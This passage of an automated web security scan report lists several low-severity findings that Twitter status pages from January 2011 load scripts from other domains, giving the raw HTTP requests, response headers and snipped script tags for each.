18.469. http://twitter.com/malsup/status/28450557672824832

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/28450557672824832

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/28450557672824832 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:55 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225115-90988-57527
ETag: "b3bacdab099b8e0f8cb99bfb2c2eefcb"
Last-Modified: Fri, 28 Jan 2011 14:31:55 GMT
X-Runtime: 0.02967
Content-Type: text/html; charset=utf-8
Content-Length: 13675
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODQ1MDU1NzY3MjgyNDgzMjoMY3NyZl9pZCIlZGJjMGMxMWFiN2Qz%250AMGU3MTRmZWFkMTQwOWU2MWVjMjU6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--6f098dd1b2ef6ae372fe1657bc91feba15cfb6e6; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.470. http://twitter.com/malsup/status/28450557672824832

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/28450557672824832

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/28450557672824832 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:27:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224842-72786-11424
ETag: "8a913eb0d26cf4b51ef377e6d58d6b3a"
Last-Modified: Fri, 28 Jan 2011 14:27:22 GMT
X-Runtime: 0.06597
Content-Type: text/html; charset=utf-8
Content-Length: 13675
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODQ1MDU1NzY3MjgyNDgzMjoMY3NyZl9pZCIlNWU2ZTIzZGIyYjk5%250AODhkOTAwNjg4NThhZjkxOGU2MmU6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--e2496f1dbb064b5c8414d329ac11463253046feb; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.471. http://twitter.com/malsup/status/28451243869339648

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/28451243869339648

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/28451243869339648 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:54 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225114-40418-38564
ETag: "becf8c1fddbedb2b66432859efada267"
Last-Modified: Fri, 28 Jan 2011 14:31:54 GMT
X-Runtime: 0.04264
Content-Type: text/html; charset=utf-8
Content-Length: 13734
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODQ1MTI0Mzg2OTMzOTY0ODoMY3NyZl9pZCIlOGQ5NDRlZjY3YTQ2%250AYWM2ZGYzMThmZDkyMTM0MDg4MmE6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lk%250AIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AAA%253D%253D--c030eb45f2f6e8c13e64a5ed3403115c11bb644b; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.472. http://twitter.com/malsup/status/28451243869339648

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/28451243869339648

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/28451243869339648 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:26:19 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224779-24208-21272
ETag: "4dec5d0def9c15c79fc9b85459882692"
Last-Modified: Fri, 28 Jan 2011 14:26:19 GMT
X-Runtime: 0.05780
Content-Type: text/html; charset=utf-8
Content-Length: 13734
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODQ1MTI0Mzg2OTMzOTY0ODoMY3NyZl9pZCIlY2UxZTYzZWM1Mzhi%250ANzUwOTg5MmZhODg2NzBlNTE3ZmE6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--92abfd30a75287ea7b714b4c2d719303b28dc49f; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.473. http://twitter.com/malsup/status/29343613573926913

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/29343613573926913

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/29343613573926913 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:26:08 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224768-45229-19192
ETag: "61be2a00c7b94607e218eb5ebb7189c0"
Last-Modified: Fri, 28 Jan 2011 14:26:08 GMT
X-Runtime: 0.04251
Content-Type: text/html; charset=utf-8
Content-Length: 13824
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTM0MzYxMzU3MzkyNjkxMzoMY3NyZl9pZCIlMDhhNzE0NWUzZGQy%250AYThjMGFmMzNlOGU2N2YzMWMyNmI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--d7b87ffd3961937960551fd20ef085add3dc652a; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.474. http://twitter.com/malsup/status/29343613573926913

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/29343613573926913

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/29343613573926913 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225113-3807-3566
ETag: "209ef292297365689cee15ddf84b693d"
Last-Modified: Fri, 28 Jan 2011 14:31:53 GMT
X-Runtime: 0.04444
Content-Type: text/html; charset=utf-8
Content-Length: 13822
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTM0MzYxMzU3MzkyNjkxMzoMY3NyZl9pZCIlYzg1MjllMjk5NjEw%250AMzQ2MDJlOTY2NDA3YTViNWM2NWI6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lk%250AIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AAA%253D%253D--dab7e194361dd90806d103d15c3f8fb3e9b20000; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.475. http://twitter.com/malsup/status/29343882311372800

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/29343882311372800

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/29343882311372800 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:52 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224752-86611-17718
ETag: "8e8ba1c134c1602542f62fdaa8e9f7dd"
Last-Modified: Fri, 28 Jan 2011 14:25:52 GMT
X-Runtime: 0.05141
Content-Type: text/html; charset=utf-8
Content-Length: 13680
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTM0Mzg4MjMxMTM3MjgwMDoMY3NyZl9pZCIlOTMwZjZkOTU4Nzcz%250AZmZlODFmOTdmMGIwMjJjZmMwZTk6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--4ec685a9450e1b8fefd04b4578645a1edde9bad3; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.476. http://twitter.com/malsup/status/29343882311372800

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/29343882311372800

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/29343882311372800 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225113-10828-8128
ETag: "1ecb577ace1df13c48be71fe9a1107a1"
Last-Modified: Fri, 28 Jan 2011 14:31:53 GMT
X-Runtime: 0.03324
Content-Type: text/html; charset=utf-8
Content-Length: 13679
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTM0Mzg4MjMxMTM3MjgwMDoMY3NyZl9pZCIlY2FiMGEyM2NkYTE4%250AMjRhYjdkOTk1ZGQ2MDc1ZTQxNTI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--8bdc41071876712c384942b7b84c016d5d49c703; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.477. http://twitter.com/malsup/status/29343882311372800

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /malsup/status/29343882311372800

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /malsup/status/29343882311372800 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:07:42 GMT
Server: hi
Status: 200 OK
